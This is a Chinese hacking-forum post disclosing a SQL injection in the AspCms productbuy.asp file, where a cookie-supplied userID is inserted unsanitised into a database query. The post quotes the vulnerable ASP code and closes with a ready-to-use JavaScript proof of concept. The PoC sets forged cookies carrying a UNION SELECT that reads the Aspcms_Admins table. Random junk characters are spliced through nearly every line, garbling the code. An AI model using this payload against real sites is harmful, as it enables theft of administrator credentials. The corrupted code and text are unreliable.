好久没上土司了,上来一看发现在删号名单内.....* ?; L! W- E' s( B, [
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。( X K/ t! t0 `5 W6 W
废话不多说,看代码:
* Z6 Y% W0 r/ E. H/ b
* J4 ]+ M; b( f$ m! n<%& n. U% @1 `/ X; j6 r l
( ]: c2 K& k: M3 S+ A6 O! Kif action = "buy" then
6 u* R9 q% i B' H3 i; F
# @( m& G* X$ u/ r( a4 d$ l+ D addOrder()9 U; v, I' f7 \
3 e, ?' p: V* v) P# Qelse8 X T: p; L; C7 t& `
/ k# [$ s. [2 V9 B1 N& Q* n
echoContent()7 o% n# s; h/ f: ?
7 I2 t3 w( V9 Zend if( r' q7 b3 @. Y, U3 n* e! M% \7 z' n
2 h O+ X3 p$ d; O
/ q7 j/ N- I& P8 E! v
% q- z/ m, C; E3 K3 `# H2 D( M4 Z……略过
6 @' O8 l2 S( q6 y' j4 H
' D: w! k- X i* C3 T [6 b
' m" G4 F% Q; \) j
$ f: s" O3 ^& K/ qSub echoContent()0 I" l7 J: A# o8 \" y8 B
9 r5 ^* {# j% s ?& \
dim id0 \( {0 E( T' o- ` N/ S/ |
" h% O. P& x6 B
id=getForm("id","get")
2 g, z% u% n, f, }: a& x4 \- b( M$ U7 X% L+ s4 \: C$ X8 z
! E* k5 h8 K4 }4 Q% x* a2 h! i
# b% X3 H9 p- {2 m% ^ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" # K x5 b$ X9 u% j$ R {
2 q1 d7 M( P; A8 `! N2 C9 g% A* Q
% J r# n; K4 f1 e4 `/ Q" B. D, N' a: `3 z" D& ^+ ?. }3 n
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")4 j/ f& W9 c+ G0 E. w& S8 h, Z
' N' H( l# V, N6 x) u) t; L dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
' R6 E2 U5 H) c' y! h6 Q$ Z- ], ]/ ~0 K* q( ^
Dim templatePath,tempStr8 R& j, Z# z; T0 D
4 R, e5 S. V& v3 s$ N templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
6 y* H3 G: W! w5 [( X$ ^! I( q U" ~' N8 A7 |3 X) q* c
6 W- v/ d- z8 n# P
v5 h" L/ _ p! a- M set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 R* S8 \ h3 c
8 M; X9 d" c6 i; u7 F1 o selectproduct=rsObj(0)
! V. s1 S* N A) h/ C! A$ G# ^
/ i0 \- Y( Y9 J " C' d# V! A7 t7 U4 }
5 b: h1 P8 x' D% C Dim linkman,gender,phone,mobile,email,qq,address,postcode1 \, `( g! V5 h# ]5 n# ?
( ^$ x" N* B& N9 F if isnul(rCookie("loginstatus")) then wCookie"loginstatus",00 X! J* N- U$ G& ]3 ~0 ~
' ?" G7 W; @+ r# `( H/ g6 k: q# R
if rCookie("loginstatus")=1 then
* |: _- L- D% Q6 k r7 t# u, D, L! c$ L
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
% `4 J$ N+ L& A6 [
3 Z% p4 F4 |9 U& E$ K linkman=rsObj("truename")
K. u( i* m- ?, b; j5 R: j; B
4 x2 G. I+ {0 d2 T9 Y gender=rsObj("gender")
- K2 {8 D5 j6 z6 n" z! t \+ h' `
1 @" V- k. H7 z8 p+ S+ I5 L* G phone=rsObj("phone")
G9 _+ [3 P* o# B8 ~! X5 s, ~; W
mobile=rsObj("mobile")" J* v" y# ?8 v7 l, P
8 F' a9 |. r* C
email=rsObj("email")) ~ }" n3 ~1 J: E* A& o$ _
- t; ]6 s" U2 M0 t
qq=rsObj("qq")% g7 d. L8 e; {9 s3 S( a
1 E. H, S% C. `. f/ k% J3 a
address=rsObj("address")
' G( P0 C; }, \% M0 d6 J: x
1 M. b& z2 \* ^; j: k" s postcode=rsObj("postcode")
4 g! z! r, E: t7 M( ^7 D! k7 N: l- x) b6 r
else ( B$ {5 I1 J, L: @9 P5 ^
4 p$ c, l) t/ _( J9 k gender=1
2 z9 ^$ K' m* L4 t6 c% D; t/ g% D/ ?8 P- P# g, f( O
end if
& n: J O# {8 m8 N; l- {1 m1 U9 Q% ]+ t8 \
rsObj.close()
/ b# C) }0 a% K5 e2 P$ D1 x! r
# c6 T6 J1 k: V3 K$ l
' ~5 R0 f1 Y+ F7 \0 o) w+ Z2 c9 D" _! D- K
with templateObj , y6 X2 g7 n+ i5 _! t
8 o0 [6 ^7 |9 W$ }3 X9 v
.content=loadFile(templatePath) + A3 h! R% O! m0 O7 K
) u* q( q6 {) k% D6 S2 R .parseHtml()$ m: W, h& z, m& O5 s) s
/ W F4 X z! s; z. H7 g; M8 s0 E
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
0 S }) B a* X1 I I) G' d( G, u( y+ M' j. \) y% U
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
6 ~+ _' m J3 c% F9 W" B. z2 N3 `, G0 ~# I
.content=replaceStr(.content,"[aspcms:gender]",gender) % E' W+ I9 a* o- f; Z `& e+ w: Q# W
) k: r3 t% e3 A3 A .content=replaceStr(.content,"[aspcms:phone]",phone)
M/ y- M( Z8 |: y
/ C9 N; v: s) d .content=replaceStr(.content,"[aspcms:mobile]",mobile)
" Z: n3 j8 J& ?; i q% a% N0 h: G# `. s; u. G
.content=replaceStr(.content,"[aspcms:email]",email) ( F; X) C- R0 Q: `: O8 ?8 |* D2 D3 z
+ a7 g" ]# q& M g6 o .content=replaceStr(.content,"[aspcms:qq]",qq) 1 F1 b1 e5 |: Z( i( c, X. @+ E
! q- f" f6 k, q" _ F$ k .content=replaceStr(.content,"[aspcms:address]",address)
+ s3 b* U- ]$ u- q u
" k8 G9 q/ E! H4 u* N8 y .content=replaceStr(.content,"[aspcms:postcode]",postcode) + n# V1 L$ G" U
5 u1 k6 P# ]; m" ^8 e1 ^ .parseCommon() ( B6 s2 D! }4 \$ h6 z( U
G$ P) G& Z* K) m* T0 h6 T6 o0 _ echo .content : `% d( m9 D5 J" H) t+ l2 {2 L0 Z F
+ U% r4 u8 l9 R" V" Y5 ` end with
. |; `: \ X! q" v6 u4 `0 q3 T; d. {7 v1 k7 N1 o1 g' w
set templateobj =nothing : terminateAllObjects
; l) G+ }0 V; t! @. O
d. T& o& p: _) u6 v) M4 ~7 EEnd Sub
$ w' J; j8 B" P漏洞很明显,没啥好说的
3 G6 J5 B, h# J* W4 u$ ?& h. \5 |poc:
/ ^$ _/ x" c( B2 {
' p' L2 q/ H6 i ]javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
9 d9 w' a% a7 Q3 d( J0 |3 J$ E' k, \# a
|